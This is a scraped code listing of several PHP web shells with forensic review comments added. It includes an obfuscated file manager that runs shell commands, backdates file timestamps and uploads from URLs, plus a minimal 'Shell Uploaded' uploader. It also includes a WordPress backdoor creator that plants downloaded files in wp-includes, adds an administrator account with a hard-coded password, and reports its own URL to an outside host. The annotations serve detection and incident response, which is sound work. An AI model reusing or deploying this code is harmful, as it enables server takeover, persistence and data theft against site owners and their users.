283 | if (!$a($c)) {
284 | return "?";
285 | }
286 | $d = $b($c($fl));
287 | if (empty($d)) {
288 | $e = $c($fl);
289 | if (empty($e)) {
290 | return "?";
291 | } else {
292 | return $e;
293 | }
294 | } else {
295 | return $d['name'];
296 | }
297 | } elseif ($a($c)) {
298 | return $c($fl);
299 | } else {
300 | return "?";
301 | }
302 | }
303 |
// fdt($fl): returns the last-modification time of $fl formatted with
// date("F d Y H:i:s", filemtime($fl)).
// Forensics note: elsewhere in this file there is an action that calls
// touch() with a caller-supplied date, so mtimes on a host where this script
// ran should not be relied on alone when building a timeline.
304 | function fdt($fl) {
305 | $a = "da"."te"; // resolves to "date"
306 | $b = "fil"."emt"."ime"; // resolves to "filemtime"
307 | return $a("F d Y H:i:s", $b($fl));
308 | }
309 |
// dunlut($fl): sends the file at $fl to the client as a download.
// If file_exists($fl) is true it emits download headers (fragment-built like
// the function names elsewhere in this file), streams the file with
// readfile(), and ends the request with exit. Otherwise it returns the string
// "File Not Found !".
// Incident-response note: the path is not restricted in this function, so any
// file readable by the web user could have been retrieved through it; scope
// exposure accordingly. Unusually large responses from this script in the
// access log are a lead worth following.
// NOTE(review): `isset($fl)` is tested after $fl has already been used, so it
// adds nothing to the check.
310 | function dunlut($fl) {
311 | $a = "fil"."e_exi"."sts"; // resolves to "file_exists"
312 | $b = "ba"."sena"."me"; // resolves to "basename"
313 | $c = "fi"."les"."ize"; // resolves to "filesize"
314 | $d = "read"."fi"."le"; // resolves to "readfile"
315 | if ($a($fl) && isset($fl)) {
316 | header('Con'.'tent-Descr'.'iption: Fi'.'le Tra'.'nsfer');
317 | header("Conte'.'nt-Control:public"); // double-quoted: the '.' is sent literally, so this header name is malformed
318 | header('Cont'.'ent-Type: a'.'pp'.'licat'.'ion/oc'.'tet-s'.'tream');
319 | header('Cont'.'ent-Dis'.'posit'.'ion: at'.'tachm'.'ent; fi'.'lena'.'me="'.$b($fl).'"');
320 | header('Exp'.'ires: 0');
321 | header("Ex"."pired:0");
322 | header('Cac'.'he-Cont'.'rol: must'.'-revali'.'date');
323 | header("Cont"."ent-Tran"."sfer-Enc"."oding:bi"."nary");
324 | header('Pra'.'gma: pub'.'lic');
325 | header('Con'.'ten'.'t-Le'.'ngth: ' .$c($fl));
326 | flush();
327 | $d($fl);
328 | exit;
329 | } else {
330 | return "Fi"."le Not F"."ound !";
331 | }
332 | }
333 |
334 | function komend($kom, $lk) {
335 | $x = "pr"."eg_"."mat"."ch";
336 | $xx = "2".">"."&"."1";
337 | if (!$x("/".$xx."/i", $kom)) {
338 | $kom = $kom." ".$xx;
339 | }
340 | $a = "fu"."ncti"."on_"."ex"."is"."ts";
341 | $b = "p"."ro"."c_op"."en";
342 | $c = "htm"."lspe"."cialc"."hars";
343 | $d = "s"."trea"."m_g"."et_c"."ont"."ents";
344 | if ($a($b)) {
345 | $ps = $b($kom, array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "r")), $meki, $lk);
346 | return "".$c($d($meki[1])).""; 347 | } else { 348 | return "pr"."oc"."_op"."en f"."unc"."tio"."n i"."s di"."sabl"."ed !"; 349 | } 350 | } 351 | 352 | function green($text) { 353 | echo " "; 369 | echo "We"."b S"."erv"."er : ".$_SERVER['SE'.'RV'.'ER_'.'SOF'.'TWA'.'RE']." "; 370 | $unm = "ph"."p_u"."na"."me"; 371 | echo "Sys"."tem : ".@$unm()." "; 372 | $gcu = "g"."et_"."curr"."ent"."_us"."er"; 373 | $gmu = "g"."et"."my"."ui"."d"; 374 | echo "Us"."er : ".@$gcu()." ( ".@$gmu().") "; 375 | $phv = "ph"."pve"."rsi"."on"; 376 | echo "PH"."P V"."er"."sio"."n : ".@$phv()." "; 377 | echo "Dis"."abl"."e Fu"."nct"."ion : ".$disf." "; 378 | echo "MySQL : "; 379 | if (@$fnct("my"."sql_co"."nne"."ct")) { 380 | echo "ON"; 381 | } else { 382 | echo "OFF"; 383 | } 384 | echo " | cURL : "; 385 | if (@$fnct("cu"."rl"."_in"."it")) { 386 | echo "ON"; 387 | } else { 388 | echo "OFF"; 389 | } 390 | echo " | WG"."ET : "; 391 | if (@$fxt("/"."us"."r/b"."in/w"."get")) { 392 | echo "ON"; 393 | } else { 394 | echo "OFF"; 395 | } 396 | echo " | Pe"."rl : "; 397 | if (@$fxt("/u"."sr/b"."in"."/pe"."rl")) { 398 | echo "ON"; 399 | } else { 400 | echo "OFF"; 401 | } 402 | echo " | Pyt"."ho"."n : "; 403 | if (@$fxt("/"."us"."r/b"."in/p"."ytho"."n2")) { 404 | echo "ON"; 405 | } else { 406 | echo "OFF"; 407 | } 408 | echo " | S"."u"."do : "; 409 | if (@$fxt("/"."us"."r/b"."in/s"."u"."d"."o")) { 410 | echo "ON"; 411 | } else { 412 | echo "OFF"; 413 | } 414 | echo " | Pk"."e"."x"."e"."c : "; 415 | if (@$fxt("/"."us"."r/b"."in/p"."k"."e"."x"."e"."c")) { 416 | echo "ON"; 417 | } else { 418 | echo "OFF"; 419 | } 420 | echo " Di"."rect"."ory : "; 421 | 422 | foreach($_POST as $key => $value){ 423 | $_POST[$key] = $sts($value); 424 | } 425 | 426 | if(isset($_GET['loknya'])){ 427 | $lokasi = $_GET['loknya']; 428 | $lokdua = $_GET['loknya']; 429 | } else { 430 | $lokasi = $gcw(); 431 | $lokdua = $gcw(); 432 | } 433 | 434 | $lokasi = $srl('\\','/',$lokasi); 435 | $lokasis = $exp('/',$lokasi); 436 | 
$lokasinya = @$scd($lokasi); 437 | 438 | foreach($lokasis as $id => $lok){ 439 | if($lok == '' && $id == 0){ 440 | $a = true; 441 | echo '/'; 442 | continue; 443 | } 444 | if($lok == '') continue; 445 | echo ''.$lok.'/'; 451 | } 452 | 453 | echo ' |
'; 454 | if (isset($_POST['upwkwk'])) { 455 | if (isset($_POST['berkasnya'])) { 456 | if ($_POST['dirnya'] == "2") { 457 | $lokasi = $_SERVER['DOC'.'UME'.'NT_R'.'OOT']; 458 | } 459 | if (empty($_FILES['berkas']['name'])) { 460 | echo "Fi"."le not Se"."lected ! "; 461 | } else { 462 | $data = @$fpt($lokasi."/".$_FILES['berkas']['name'], @$fgt($_FILES['berkas']['tm'.'p_na'.'me'])); 463 | if ($fxt($lokasi."/".$_FILES['berkas']['name'])) { 464 | $fl = $lokasi."/".$_FILES['berkas']['name']; 465 | echo "Fi"."le Upl"."oa"."ded ! ".$fl." "; 466 | if ($sps($lokasi, $_SERVER['DO'.'CU'.'M'.'ENT'.'_R'.'OO'.'T']) !== false) { 467 | $lwb = $srl($_SERVER['DO'.'CU'.'M'.'ENT'.'_R'.'OO'.'T'], $wb."/", $fl); 468 | echo "Li"."nk : ".$lwb." "; 469 | } 470 | echo " "; 471 | } else { 472 | echo "Fa"."ile"."d to Up"."lo"."ad ! "; 473 | } 474 | } 475 | } elseif (isset($_POST['linknya'])) { 476 | if (empty($_POST['namalink'])) { 477 | echo "Fi"."lename cannot be empty ! "; 478 | } elseif (empty($_POST['darilink'])) { 479 | echo "Link cannot be empty ! "; 480 | } else { 481 | if ($_POST['dirnya'] == "2") { 482 | $lokasi = $_SERVER['DOC'.'UME'.'NT_R'.'OOT']; 483 | } 484 | $data = @$fpt($lokasi."/".$_POST['namalink'], @$fgt($_POST['darilink'])); 485 | if ($fxt($lokasi."/".$_POST['namalink'])) { 486 | $fl = $lokasi."/".$_POST['namalink']; 487 | echo "Fi"."le Uplo"."ade"."d ! ".$fl." "; 488 | if ($sps($lokasi, $_SERVER['DO'.'CU'.'M'.'ENT'.'_R'.'OO'.'T']) !== false) { 489 | $lwb = $srl($_SERVER['DO'.'CU'.'M'.'ENT'.'_R'.'OO'.'T'], $wb."/", $fl); 490 | echo "Li"."nk : ".$lwb." "; 491 | } 492 | echo " "; 493 | } else { 494 | echo "Fa"."iled to Up"."lo"."ad ! "; 495 | } 496 | } 497 | } 498 | } 499 | 500 | echo "Uplo"."ad Fi"."le : "; 501 | echo ''; 509 | echo ' '; 513 | echo " |
"; 514 | 515 | echo '
"; 519 | 520 | if (isset($_GET['lokasie'])) { 521 | echo "
'; 523 | echo "
".htmlspecialchars($fgt($_GET['lokasie'])).""; 524 | author(); 525 | } elseif (isset($_POST['loknya']) && $_POST['pilih'] == "hapus") { 526 | if ($idi($_POST['loknya']) && $fxt($_POST['loknya'])) { 527 | xrd($_POST['loknya']); 528 | if ($fxt($_POST['loknya'])) { 529 | red("Fai"."led to del"."ete Dir"."ec"."tory !"); 530 | } else { 531 | green("Del"."ete Dir"."ect"."ory Suc"."cess !"); 532 | } 533 | } elseif ($ifi($_POST['loknya']) && $fxt($_POST['loknya'])) { 534 | @$ulk($_POST['loknya']); 535 | if ($fxt($_POST['loknya'])) { 536 | red("Failed to Delete Fi"."le !"); 537 | } else { 538 | green("De"."le"."te Fi"."le Succ"."ess !"); 539 | } 540 | } else { 541 | red("Fi"."le / Dir"."ecto"."ry not Fo"."und !"); 542 | } 543 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "ubahmod") { 544 | if (!isset($_POST['cemod'])) { 545 | if ($_POST['ty'.'pe'] == "fi"."le") { 546 | echo "
"; 547 | } else { 548 | echo "
"; 549 | } 550 | echo '
'; 561 | } else { 562 | $cm = @$chm($_POST['loknya'], $ocd($_POST['perm'])); 563 | if ($cm == true) { 564 | green("Change Mod Success !"); 565 | if ($_POST['ty'.'pe'] == "fi"."le") { 566 | echo "
"; 567 | } else { 568 | echo "
"; 569 | } 570 | echo '
'; 581 | } else { 582 | red("Change Mod Failed !"); 583 | if ($_POST['ty'.'pe'] == "fi"."le") { 584 | echo "
"; 585 | } else { 586 | echo "
"; 587 | } 588 | echo '
'; 599 | } 600 | } 601 | } elseif (isset($_POST['loknya']) && $_POST['pilih'] == "ubahnama") { 602 | if (isset($_POST['gantin'])) { 603 | $namabaru = $_GET['loknya']."/".$_POST['newname']; 604 | $ceen = "re"."na"."me"; 605 | if (@$ceen($_POST['loknya'], $namabaru) === true) { 606 | green("Change Name Success"); 607 | if ($_POST['ty'.'pe'] == "fi"."le") { 608 | echo "
"; 609 | } else { 610 | echo "
"; 611 | } 612 | echo '
'; 623 | } else { 624 | red("Change Name Failed"); 625 | } 626 | } else { 627 | if ($_POST['ty'.'pe'] == "fi"."le") { 628 | echo "
"; 629 | } else { 630 | echo "
"; 631 | } 632 | echo '
'; 643 | } 644 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "edit") { 645 | if (isset($_POST['gasedit'])) { 646 | $edit = @$fpt($_POST['loknya'], $_POST['src']); 647 | if ($fgt($_POST['loknya']) == $_POST['src']) { 648 | green("Ed"."it Fi"."le Suc"."ce"."ss !"); 649 | } else { 650 | red("Ed"."it Fi"."le Fai"."led !"); 651 | } 652 | } 653 | echo "
"; 654 | echo '
'; 660 | } elseif (isset($_POST['komends'])) { 661 | if (isset($_POST['komend'])) { 662 | if (isset($_GET['loknya'])) { 663 | $lk = $_GET['loknya']; 664 | } else { 665 | $lk = $gcw(); 666 | } 667 | $km = 'ko'.'me'.'nd'; 668 | echo $km($_POST['komend'], $lk); 669 | exit(); 670 | } 671 | } elseif (isset($_POST['loknya']) && $_POST['pilih'] == "ubahtanggal") { 672 | if (isset($_POST['tanggale'])) { 673 | $stt = "st"."rtot"."ime"; 674 | $tch = "t"."ou"."ch"; 675 | $tanggale = $stt($_POST['tanggal']); 676 | if (@$tch($_POST['loknya'], $tanggale) === true) { 677 | green("Change Da"."te Succ"."ess !"); 678 | $det = "da"."te"; 679 | $ftm = "fi"."le"."mti"."me"; 680 | $b = $det("d F Y H:i:s", $ftm($_POST['loknya'])); 681 | if ($_POST['ty'.'pe'] == "fi"."le") { 682 | echo "
"; 683 | } else { 684 | echo "
"; 685 | } 686 | echo '
'; 697 | } else { 698 | red("Fai"."led to Cha"."nge Da"."te !"); 699 | } 700 | } else { 701 | $det = "da"."te"; 702 | $ftm = "fi"."le"."mti"."me"; 703 | $b = $det("d F Y H:i:s", $ftm($_POST['loknya'])); 704 | if ($_POST['ty'.'pe'] == "fi"."le") { 705 | echo "
"; 706 | } else { 707 | echo "
"; 708 | } 709 | echo '
'; 720 | } 721 | } elseif (isset($_POST['loknya']) && $_POST['pilih'] == "dunlut") { 722 | $dunlute = $_POST['loknya']; 723 | if ($fxt($dunlute) && isset($dunlute)) { 724 | if ($ird($dunlute)) { 725 | dunlut($dunlute); 726 | } elseif ($idr($fl)) { 727 | red("That is Di"."rec"."tory, Not Fi"."le -_-"); 728 | } else { 729 | red("Fi"."le is Not Re"."adab"."le !"); 730 | } 731 | } else { 732 | red("Fi"."le Not Fo"."und !"); 733 | } 734 | } elseif (isset($_POST['loknya']) && $_POST['pilih'] == "fo"."ld"."er") { 735 | if ($isw("./") || $ird("./")) { 736 | $loke = $_POST['loknya']; 737 | if (isset($_POST['buatfolder'])) { 738 | $buatf = $mkd($loke."/".$_POST['fo'.'lde'.'rba'.'ru']); 739 | if ($buatf == true) { 740 | green("Folder ".htmlspecialchars($_POST['fo'.'lde'.'rba'.'ru'])." Created !"); 741 | echo ''; 744 | } else { 745 | red("Failed to Create folder !"); 746 | echo ''; 749 | } 750 | } else { 751 | echo ''; 753 | } 754 | } 755 | } elseif (isset($_POST['lok'.'nya']) && $_POST['pilih'] == "fi"."le") { 756 | if ($isw("./") || $isr("./")) { 757 | $loke = $_POST['lok'.'nya']; 758 | if (isset($_POST['buatfi'.'le'])) { 759 | $buatf = $fpt($loke."/".$_POST['fi'.'lebaru'], ""); 760 | if ($fxt($loke."/".$_POST['fi'.'lebaru'])) { 761 | green("File ".htmlspecialchars($_POST['fi'.'lebaru'])." Created !"); 762 | echo ''; 765 | } else { 766 | red("Failed to Create File !"); 767 | echo ''; 770 | } 771 | } else { 772 | echo ''; 774 | } 775 | } 776 | } 777 | 778 | echo '
.. | 792 ||||||
".$ppkcina." | 816 ||||||
".cfn($euybray)." $mekicina | 853 |
$output"; 35 | } 36 | 37 |
// NOTE(review): the bare numbers followed by "|" are line-gutter cells left by the page this
// listing was extracted from, and HTML inside the echo strings was stripped. The start of the
// function that closes above is not visible in this excerpt.
//
// createFile(): writes $content to $fileName with file_put_contents() and echoes the outcome.
// $fileName is interpolated into the response without HTML escaping. The caller is not visible
// here; presumably a request handler, to be confirmed against the full file.
38 | function createFile($fileName, $content) { 39 | if (file_put_contents($fileName, $content) !== false) { 40 | echo "File '$fileName' created successfully!"; 41 | } else { 42 | echo "Failed to create file '$fileName'."; 43 | } 44 | } 45 | 46 |
// Upload handler. No authentication or authorisation check is visible around this or any of the
// handlers below. The file is stored under $currentDir (assigned outside this excerpt) under the
// client-supplied base name: basename() removes directory components, but neither extension nor
// content is restricted, so a server-side script can land in a web-served directory.
// Defensive takeaway: deny script execution in writable directories and alert on new .php files
// appearing there.
47 | if (isset($_POST['upload'])) { 48 | $target_dir = $currentDir . "/"; 49 | $target_file = $target_dir . basename($_FILES['file']['name']); 50 | 51 | 52 | if (move_uploaded_file($_FILES['file']['tmp_name'], $target_file)) { 53 | echo "The file ". htmlspecialchars(basename($_FILES['file']['name'])). " has been uploaded."; 54 | } else { 55 | echo "Sorry, there was an error uploading your file."; 56 | } 57 | } 58 | 59 |
// mkdir / delete handlers: each takes a query-string value and appends it to $currentDir . '/'
// with no normalisation, so ".." segments are not rejected and the operation is not confined to
// $currentDir. $dirName and $fileName are echoed unescaped (reflected HTML injection).
// In access logs these appear as GET requests carrying mkdir= or delete= against this script.
60 | if (isset($_GET['mkdir'])) { 61 | $dirName = $_GET['mkdir']; 62 | if (mkdir($currentDir . '/' . $dirName)) { 63 | echo "Directory '$dirName' created successfully!"; 64 | } else { 65 | echo "Failed to create directory '$dirName'."; 66 | } 67 | } 68 | 69 | 70 | if (isset($_GET['delete'])) { 71 | $fileName = $_GET['delete']; 72 | if (unlink($currentDir . '/' . $fileName)) { 73 | echo "File '$fileName' deleted successfully!"; 74 | } else { 75 | echo "Failed to delete file '$fileName'."; 76 | } 77 | } 78 | 79 |
// view handler: same unnormalised path concatenation as above (arbitrary file read for whatever
// the PHP process can open). The file contents pass through htmlspecialchars() before output;
// the file name in the not-found message does not.
80 | if (isset($_GET['view'])) { 81 | $fileName = $_GET['view']; 82 | if (file_exists($currentDir . '/' . $fileName)) { 83 | $content = file_get_contents($currentDir . '/' . $fileName); 84 | echo "
" . htmlspecialchars($content) . ""; 85 | } else { 86 | echo "File '$fileName' does not exist."; 87 | } 88 | } 89 | ?> 90 | 91 | 92 | 93 | 94 | 95 | 96 |
PHP File Manager
168 | 169 |Current Directory:
171 | 176 |Create a File
179 | 186 | 187 | 193 | 194 |Run a Command
195 | 200 | 201 |Upload a File
202 | 207 | 208 |Create a Directory
209 | 214 | 215 |Delete a File
216 | 221 | 222 |View a File
223 | 228 | 229 | 235 | 236 | 237 | 238 | -------------------------------------------------------------------------------- /tools/backdoor_creator.php: -------------------------------------------------------------------------------- 1 | Created: " . get_full_url($filePath) . ""; 55 | } catch (Exception $e) { 56 | echo "
"; 57 | } 58 | } 59 | } 60 | } 61 |
/**
 * Loads wp-config.php and two WordPress core include files from $rootDir, then, only when no
 * user named $username exists and no account uses "$username@example.com", creates that user
 * with $password and assigns it the `administrator` role. The messages echoed in both branches
 * were lost when the page's HTML was stripped. `global $wpdb` is declared but not referenced in
 * the visible body.
 *
 * NOTE(review): this is account-level persistence. It survives removal of the dropped files, so
 * clean-up has to include an audit of administrator accounts. The fixed "@example.com" address
 * pattern built here is a usable search key, as is the login passed by the caller later in this
 * file ('MrZ').
 *
 * @param string $rootDir  Directory expected to contain a WordPress installation.
 * @param string $username Login to create; also used as the local part of the e-mail address.
 * @param string $password Password for the new account.
 */
62 | function create_wp_admin_user($rootDir, $username, $password) { 63 | require_once($rootDir . '/wp-config.php'); 64 | require_once($rootDir . '/wp-includes/wp-db.php'); 65 | require_once($rootDir . '/wp-includes/pluggable.php'); 66 | 67 | global $wpdb; 68 | 69 | $user_id = username_exists($username); 70 | if (!$user_id && email_exists($username . '@example.com') == false) { 71 | $user_id = wp_create_user($username, $password, $username . '@example.com'); 72 | $user = new WP_User($user_id); 73 | $user->set_role('administrator'); 74 | echo "
"; 75 | } else { 76 | echo "
"; 77 | } 78 | } 79 |
// NOTE(review): the base64 literal decodes to hxxps://siyahi[.]top/test/style[.]php (defanged).
// Further down this file the script POSTs its own URL to that address, i.e. the tool reports
// every location it is deployed at to a third party. The same encoded literal also appears in
// another shell earlier on this page, so it works as a static signature across these files.
80 | $k3yw = base64_decode('aHR0cHM6Ly9zaXlhaGkudG9wL3Rlc3Qvc3R5bGUucGhw'); 81 | 82 | echo " 83 | 84 |
@trxsecurity
86 | 87 | 123 | 124 | "; 125 |
// NOTE(review): the bare numbers followed by "|" are line-gutter cells from the scraped page,
// and the HTML inside the echo strings was stripped.
// $rootDir is taken verbatim from the POST field `directory` (falling back to this script's own
// directory), so every path written below is chosen by whoever submits the form.
126 | $currentDir = __DIR__; 127 | $rootDir = isset($_POST['directory']) ? $_POST['directory'] : $currentDir; 128 | 129 | echo ""; 134 |
// On any POST: if $rootDir holds a wp-config.php, content fetched by download_content() is
// written to two fixed paths inside wp-includes, next to the ID3 and PHPMailer directories.
// Each write happens only when the file does not already exist. $url1, $url2, download_content()
// and get_full_url() are defined outside the visible text.
// Detection: both paths are fixed strings and can be checked directly. A core integrity check
// (for example WP-CLI's `wp core verify-checksums`) should confirm whether they belong to the
// installed release.
135 | if ($_SERVER['REQUEST_METHOD'] == 'POST') { 136 | if (file_exists($rootDir . '/wp-config.php')) { 137 | echo ""; 138 | 139 | $path1 = $rootDir . '/wp-includes/ID3/module.audio.ac4.php'; 140 | if (!file_exists($path1)) { 141 | try { 142 | file_put_contents($path1, download_content($url1)); 143 | echo "Created: " . get_full_url($path1) . "
"; 144 | } catch (Exception $e) { 145 | echo "
"; 146 | } 147 | } 148 | 149 | $path2 = $rootDir . '/wp-includes/PHPMailer/config.php'; 150 | if (!file_exists($path2)) { 151 | try { 152 | file_put_contents($path2, download_content($url2)); 153 | echo "Created: " . get_full_url($path2) . "
"; 154 | } catch (Exception $e) { 155 | echo "
"; 156 | } 157 | } 158 |
// Additional copies are placed by create_files_in_subdirectories() (body not visible here), and
// an administrator account with a hard-coded login is created. Remediation therefore has to
// cover three things: the two fixed paths above, whatever the subdirectory pass wrote, and the
// user table. Without a wp-config.php only the subdirectory pass runs.
159 | create_files_in_subdirectories($rootDir, $url1); 160 | create_wp_admin_user($rootDir, 'MrZ', 'trxsecurity'); 161 | } else { 162 | echo "
"; 163 | create_files_in_subdirectories($rootDir, $url1); 164 | } 165 | } 166 | 167 | echo ""; 168 |
// Call-home: runs on every request, not only on POST. The script builds its own URL from the
// Host header and REQUEST_URI and sends it as the form field `file_url` in an HTTP POST to
// $k3yw (the base64-decoded address assigned earlier in this file). `@` hides the warning when
// the request fails.
// Detection/mitigation: an outbound HTTP POST from the PHP worker to an unfamiliar host with a
// `file_url=` body is a network indicator. file_get_contents() on a URL depends on
// allow_url_fopen, and default-deny egress from web servers blocks the report.
169 | $cur = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; 170 | $data = array('file_url' => $cur); 171 | $options = array( 172 | 'http' => array( 173 | 'method' => 'POST', 174 | 'header' => 'Content-type: application/x-www-form-urlencoded', 175 | 'content' => http_build_query($data), 176 | ), 177 | ); 178 | $context = stream_context_create($options); 179 | $result = @file_get_contents($k3yw, false, $context); 180 | if ($result === false) { 181 | echo "
"; 182 | } 183 | ?> 184 | -------------------------------------------------------------------------------- /uper.php: -------------------------------------------------------------------------------- 1 | ! Uploader !'; 3 | echo '| M@rAz Ali |'; 4 | echo "".php_uname()."
"; 5 | echo '';
// uper.php: minimal uploader. php_uname() output is echoed above, disclosing host OS details to
// any visitor. When the POST field `_upl` equals "Upload", the uploaded temp file is copied to
// the client-supplied file name relative to the working directory. No authentication, extension
// check or content check is visible, `@` suppresses copy() warnings, and $_POST['_upl'] is read
// without isset().
// Detection: a multipart POST with `_upl=Upload`, and the literal response strings below.
7 | if( $_POST['_upl'] == "Upload" ) { 8 | if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Shell Uploaded ! :)
'; } 9 | else { echo 'Not uploaded !
';} 10 | } 11 | ?> 12 | --------------------------------------------------------------------------------